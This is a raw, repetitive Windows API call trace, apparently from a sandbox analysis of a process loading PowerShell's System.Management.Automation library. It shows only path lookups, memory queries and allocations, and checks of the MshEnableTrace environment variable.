	[0330.946] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0330.946] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0330.946] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0330.946] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0330.946] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0330.946] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0330.947] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0330.947] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0330.947] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0330.947] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0330.947] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0330.948] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0330.958] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0330.958] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0330.958] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0330.958] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0331.557] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0331.557] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0331.557] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0331.558] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0331.558] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0331.558] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0331.558] VirtualQuery (in: lpAddress=0x1cb990, lpBuffer=0x1cc850, dwLength=0x30 | out: lpBuffer=0x1cc850*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0331.559] CoTaskMemAlloc (cb=0x104) returned 0x3d2560
	[0331.559] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d2560, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0331.559] CoTaskMemFree (pv=0x3d2560) 
	[0331.561] VirtualQuery (in: lpAddress=0x1cb990, lpBuffer=0x1cc850, dwLength=0x30 | out: lpBuffer=0x1cc850*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0331.565] CoTaskMemAlloc (cb=0x104) returned 0x3d2560
	[0331.565] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d2560, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0331.565] CoTaskMemFree (pv=0x3d2560) 
	[0331.566] CoTaskMemAlloc (cb=0x104) returned 0x3d2560
	[0331.566] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d2560, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0331.566] CoTaskMemFree (pv=0x3d2560) 
	[0331.566] CoTaskMemAlloc (cb=0x104) returned 0x3d2560
	[0331.566] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d2560, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0331.566] CoTaskMemFree (pv=0x3d2560) 
	[0331.568] CoTaskMemAlloc (cb=0x104) returned 0x3d2560
	[0331.568] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d2560, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0331.568] CoTaskMemFree (pv=0x3d2560) 
	[0331.569] CoTaskMemAlloc (cb=0x104) returned 0x3d2560
	[0331.569] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d2560, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0331.569] CoTaskMemFree (pv=0x3d2560) 
	[0331.570] CoTaskMemAlloc (cb=0x104) returned 0x3d2560
	[0331.570] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d2560, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0331.570] CoTaskMemFree (pv=0x3d2560) 
	[0331.571] VirtualQuery (in: lpAddress=0x1cb990, lpBuffer=0x1cc850, dwLength=0x30 | out: lpBuffer=0x1cc850*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0331.571] VirtualQuery (in: lpAddress=0x1cb990, lpBuffer=0x1cc850, dwLength=0x30 | out: lpBuffer=0x1cc850*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0332.382] VirtualQuery (in: lpAddress=0x1cb990, lpBuffer=0x1cc850, dwLength=0x30 | out: lpBuffer=0x1cc850*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0332.384] CoTaskMemAlloc (cb=0x104) returned 0x3d2560
	[0332.384] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d2560, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0332.384] CoTaskMemFree (pv=0x3d2560) 
	[0334.480] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x3d29a0
	[0334.480] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x3d2ab0
	[0335.512] VirtualQuery (in: lpAddress=0x1cb990, lpBuffer=0x1cc850, dwLength=0x30 | out: lpBuffer=0x1cc850*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0336.013] VirtualQuery (in: lpAddress=0x1cb990, lpBuffer=0x1cc850, dwLength=0x30 | out: lpBuffer=0x1cc850*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0336.014] VirtualQuery (in: lpAddress=0x1cb990, lpBuffer=0x1cc850, dwLength=0x30 | out: lpBuffer=0x1cc850*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0336.014] VirtualQuery (in: lpAddress=0x1ca3e0, lpBuffer=0x1cb2a0, dwLength=0x30 | out: lpBuffer=0x1cb2a0*(BaseAddress=0x1ca000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0336.486] VirtualQuery (in: lpAddress=0x1cb990, lpBuffer=0x1cc850, dwLength=0x30 | out: lpBuffer=0x1cc850*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0336.486] VirtualQuery (in: lpAddress=0x1cb990, lpBuffer=0x1cc850, dwLength=0x30 | out: lpBuffer=0x1cc850*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0336.487] VirtualQuery (in: lpAddress=0x1cb990, lpBuffer=0x1cc850, dwLength=0x30 | out: lpBuffer=0x1cc850*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0336.487] VirtualQuery (in: lpAddress=0x1cb990, lpBuffer=0x1cc850, dwLength=0x30 | out: lpBuffer=0x1cc850*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0336.487] VirtualQuery (in: lpAddress=0x1cb990, lpBuffer=0x1cc850, dwLength=0x30 | out: lpBuffer=0x1cc850*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0336.487] VirtualQuery (in: lpAddress=0x1cb990, lpBuffer=0x1cc850, dwLength=0x30 | out: lpBuffer=0x1cc850*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0336.487] VirtualQuery (in: lpAddress=0x1cb990, lpBuffer=0x1cc850, dwLength=0x30 | out: lpBuffer=0x1cc850*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0336.487] VirtualQuery (in: lpAddress=0x1cb990, lpBuffer=0x1cc850, dwLength=0x30 | out: lpBuffer=0x1cc850*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0336.487] VirtualQuery (in: lpAddress=0x1cb990, lpBuffer=0x1cc850, dwLength=0x30 | out: lpBuffer=0x1cc850*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0336.487] VirtualQuery (in: lpAddress=0x1cb990, lpBuffer=0x1cc850, dwLength=0x30 | out: lpBuffer=0x1cc850*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0336.487] VirtualQuery (in: lpAddress=0x1cb990, lpBuffer=0x1cc850, dwLength=0x30 | out: lpBuffer=0x1cc850*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0336.487] VirtualQuery (in: lpAddress=0x1cb990, lpBuffer=0x1cc850, dwLength=0x30 | out: lpBuffer=0x1cc850*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0336.487] VirtualQuery (in: lpAddress=0x1cb990, lpBuffer=0x1cc850, dwLength=0x30 | out: lpBuffer=0x1cc850*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0336.488] VirtualQuery (in: lpAddress=0x1cb990, lpBuffer=0x1cc850, dwLength=0x30 | out: lpBuffer=0x1cc850*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0336.488] VirtualQuery (in: lpAddress=0x1cb990, lpBuffer=0x1cc850, dwLength=0x30 | out: lpBuffer=0x1cc850*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0336.488] VirtualQuery (in: lpAddress=0x1cb990, lpBuffer=0x1cc850, dwLength=0x30 | out: lpBuffer=0x1cc850*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0336.488] VirtualQuery (in: lpAddress=0x1cb990, lpBuffer=0x1cc850, dwLength=0x30 | out: lpBuffer=0x1cc850*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0336.488] VirtualQuery (in: lpAddress=0x1cb990, lpBuffer=0x1cc850, dwLength=0x30 | out: lpBuffer=0x1cc850*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0336.488] VirtualQuery (in: lpAddress=0x1cb990, lpBuffer=0x1cc850, dwLength=0x30 | out: lpBuffer=0x1cc850*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0336.488] VirtualQuery (in: lpAddress=0x1cb990, lpBuffer=0x1cc850, dwLength=0x30 | out: lpBuffer=0x1cc850*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0336.488] VirtualQuery (in: lpAddress=0x1cb990, lpBuffer=0x1cc850, dwLength=0x30 | out: lpBuffer=0x1cc850*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0336.488] VirtualQuery (in: lpAddress=0x1cb990, lpBuffer=0x1cc850, dwLength=0x30 | out: lpBuffer=0x1cc850*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0336.488] VirtualQuery (in: lpAddress=0x1cb990, lpBuffer=0x1cc850, dwLength=0x30 | out: lpBuffer=0x1cc850*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0336.489] VirtualQuery (in: lpAddress=0x1cb990, lpBuffer=0x1cc850, dwLength=0x30 | out: lpBuffer=0x1cc850*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0336.489] VirtualQuery (in: lpAddress=0x1cb990, lpBuffer=0x1cc850, dwLength=0x30 | out: lpBuffer=0x1cc850*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0336.489] VirtualQuery (in: lpAddress=0x1cb990, lpBuffer=0x1cc850, dwLength=0x30 | out: lpBuffer=0x1cc850*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0336.489] VirtualQuery (in: lpAddress=0x1cb990, lpBuffer=0x1cc850, dwLength=0x30 | out: lpBuffer=0x1cc850*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0336.489] VirtualQuery (in: lpAddress=0x1cb990, lpBuffer=0x1cc850, dwLength=0x30 | out: lpBuffer=0x1cc850*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0336.489] VirtualQuery (in: lpAddress=0x1cb990, lpBuffer=0x1cc850, dwLength=0x30 | out: lpBuffer=0x1cc850*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0336.492] CoTaskMemAlloc (cb=0x104) returned 0x3d2bc0
	[0336.492] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d2bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0336.492] CoTaskMemFree (pv=0x3d2bc0) 
	[0336.503] CoTaskMemAlloc (cb=0x104) returned 0x3d2bc0
	[0336.503] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d2bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0336.503] CoTaskMemFree (pv=0x3d2bc0) 
	[0336.503] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.504] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.504] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.504] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.967] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.967] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.967] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.967] VirtualQuery (in: lpAddress=0x1cbc40, lpBuffer=0x1ccb00, dwLength=0x30 | out: lpBuffer=0x1ccb00*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0336.968] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
